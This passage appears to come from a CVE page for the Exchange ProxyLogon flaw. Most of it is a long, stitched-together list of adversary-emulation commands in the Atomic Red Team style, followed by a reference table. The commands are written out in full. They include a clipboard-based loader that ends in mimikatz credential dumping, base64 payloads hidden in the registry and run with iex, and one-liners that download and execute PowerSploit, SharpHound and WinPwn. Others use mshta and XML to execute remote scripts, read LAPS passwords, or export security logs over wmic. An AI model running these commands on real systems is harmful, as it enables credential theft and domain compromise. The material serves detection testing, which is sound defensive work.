500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (7)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-26855 |
| portal.msrc.microsoft.com |
GitHub CVE
x_refsource_MISC
|
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855 |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/161846/Microsoft-Exchange-2019-SSRF-Arbitrary-File-Write.html |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/161938/Microsoft-Exchange-ProxyLogon-Remote-Code-Execution.html |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/162610/Microsoft-Exchange-2019-Unauthenticated-Email-Download.html |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/162736/Microsoft-Exchange-ProxyLogon-Collector.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-26855 |